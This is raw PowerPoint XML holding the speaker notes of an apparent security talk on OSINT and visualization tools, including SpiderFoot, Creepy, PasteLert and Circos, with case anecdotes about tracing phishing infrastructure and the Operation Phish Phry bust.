            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> was a tool build by Dave </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Dittrich</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> out of the University of Washington </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>My original use of the tool was to calculate and summarize my full packet capture logs over time in 1 hour chunks of time; then visualize those totals. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The idea being that from hour to hour our traffic doubled or more then this would show a visual clue that either the network just got really popular or that we were experiencing a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> attack </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CODE:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://staff.washington.edu/dittrich/talks/core02/tools/tools.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{979C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>22</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92377355"/>
      </p:ext>
    </p:extLst>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Worth mentioning new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> player, haven’t used it yet </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="910063" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SpiderFoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – New </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>footprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> tool http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>www.spiderfoot.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</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79C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>24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screenshot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> from the newest version Tungsten that was just released after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Blackhat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (Aug 2013) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{979C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>26</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38783110"/>
      </p:ext>
    </p:extLst>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 related</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>open research</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> into FBI Operation Phish </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Phry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>  back in 2009 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The case, known as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Operation Phish Phry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> was the top story on the FBI website yesterday. Robert Mueller announced the case during a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>speech to the Commonwealth Club of California</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, where he praised the cooperation with the Secret Service and their Los Angeles Electronic Crimes Task Force, as well as state and local law enforcement. He said this was the first joint cyber investigation with Egypt and that this cooperative effort illustrates "the power of our global partnerships." Mueller also used the speech to praise the 32,000 members of the FBI's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>InfraGard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> program, "experts on our critical infrastructure" who help the FBI prevent risks to that infrastructure from becoming a reality.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>SOURCE: http://garwarner.blogspot.com/2009/10/fbis-biggest-domestic-phishing-bust.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{979C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>30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r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> for Image and full story </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="455031">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SOURCE: http://www.infosecisland.com/blogview/22437-Network-Surveillance-Devices-Discovered-via-Shodan.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>As mentioned there are quite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> a number of programming languages supported that can use the API’s </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{979C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>32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SOURCE: http://secviz.org/content/a-day-ids-snort-event-data </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The results are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Signature, Source Address, Destination Address, Count</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{979C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>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Site: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://ilektrojohn.github.io/creepy/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An application that allows you to gather geo-location related information about users from social networking platforms and image hosting services. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{979C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>34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Site: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>www.tineye.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{979C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>35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600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Pastycake</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> – Command line tool useful for integration into workflows created by Brandon Dixon </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>https://github.com/9b/pastycake </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Pastelert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – Created by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Andrew from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Paterva</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Maltego</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>) useful for web-driven processes or quick searches </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="910063" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://www.andrewmohawk.com/pasteLert/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{979C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>36</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2722726"/>
      </p:ext>
    </p:extLst>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Developed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> for a security conference presentation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Great project to bring in-house and improve </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2" defTabSz="910063" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CODE:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/hyprwired/osint-opsec-tool#readme</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{979C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>37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9C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>39</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1823356"/>
      </p:ext>
    </p:extLst>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Port to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and C developed by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> me, shared with author and worked to deploy in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>DoD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> customer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{979C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>40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domain in the top right of the image was the C2 of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> a piece of malware used in a targeted phish campaign. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This phish was meant to appear to come from the FBI. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Though</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> our investigation it was revealed that the attackers shared infrastructure with another campaign that was targeting another federal agency. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{979C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>44</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from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> an old case of mine </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>It started with a detected download of an exe file and ended up showing an entire campaign that targeted a group of individuals that were all on the same government contract. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{979C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>46</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729724538"/>
      </p:ext>
    </p:extLst>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notes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> showing the relationships with the Fraudulent company </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{979C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>48</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890093120"/>
      </p:ext>
    </p:extLst>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Example from tracking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> public postings (twitter) of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Lulzsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> members to their real identities and countries where they live </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{979C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>51</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784940216"/>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Great Reference site with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> ideas, tools, and example images is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Raffy’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> site </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>http://www.secviz.org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79C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>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ECB632-2B87-704D-8C87-307CB285A934}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>52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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> information available but this shows some of the relationships found between the news posting and a pro-Assad jihadi groups online presence </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{979C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>53</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06944551"/>
      </p:ext>
    </p:extLst>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were only displayed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> in the local demo to highlight other use cases </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{979C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>55</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7743268"/>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New</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> tool – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Circos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (http://circos.ca/) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Mapping inappropriate emails content to users </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SOURCE:http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://secviz.org/content/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>circos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-inappropriate-email-content-investigation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{979C8A94-F62E-4072-B85F-8EC1A23AAB45}"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Mapping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> shared infrastructure of attacks specifically trying to hide their BGP relationships </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
